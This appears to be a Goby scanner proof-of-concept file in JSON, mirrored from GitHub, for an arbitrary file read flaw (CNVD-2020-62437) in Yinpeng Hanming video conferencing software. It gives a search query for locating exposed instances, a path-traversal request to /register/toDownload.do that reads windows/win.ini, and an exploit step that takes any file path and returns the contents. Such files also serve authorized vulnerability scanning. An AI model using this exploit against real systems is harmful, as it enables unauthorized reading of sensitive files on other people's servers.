mirror of https://github.com/qwqdanchun/Goby.git
98 lines
3.9 KiB
JSON
98 lines
3.9 KiB
JSON
{
|
|
"Name": "Yinpeng Hanming Video Conferencing Arbitrary file read (CNVD-2020-62437)",
|
|
"Level": "1",
|
|
"Tags": [
|
|
"Disclosure of Sensitive Information"
|
|
],
|
|
"GobyQuery": "app=\"Hanming-Video-Conferencing\"",
|
|
"Description": "Shenzhen yinpeng cloud computing Co., Ltd. was established on September 11, 2013. Its business scope includes the development and sales of cloud computing technology, the design of computer software and hardware products, etc.\n\n\n\nThere is an arbitrary file download vulnerability in haoshitong video conference system of Shenzhen yinpeng cloud computing Co., Ltd., which can be used by attackers to obtain sensitive information.",
|
|
"Product": "Yinpeng Hanming Video Conferencing",
|
|
"Homepage": "http://zhibo.hst.com/",
|
|
"Author": "PeiQi",
|
|
"Impact": "<p>which can be used by attackers to obtain sensitive information.<br></p>",
|
|
"Recommandation": "<p>Limiting the use of dangerous characters</p>",
|
|
"References": [
|
|
"http://wiki.peiqi.tech"
|
|
],
|
|
"HasExp": true,
|
|
"ExpParams": [
|
|
{
|
|
"name": "File",
|
|
"type": "select",
|
|
"value": "windows/win.ini",
|
|
"show": ""
|
|
}
|
|
],
|
|
"ScanSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"method": "GET",
|
|
"uri": "/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini",
|
|
"follow_redirect": true,
|
|
"header": {},
|
|
"data_type": "text",
|
|
"data": ""
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "fonts",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": []
|
|
}
|
|
],
|
|
"ExploitSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"method": "GET",
|
|
"uri": "/register/toDownload.do?fileName=../../../../../../../../../../../../../../{{{File}}}",
|
|
"follow_redirect": true,
|
|
"header": {},
|
|
"data_type": "text",
|
|
"data": ""
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "fonts",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody"
|
|
]
|
|
}
|
|
],
|
|
"PostTime": "2021-04-04 16:11:09",
|
|
"GobyVersion": "1.8.255"
|
|
} |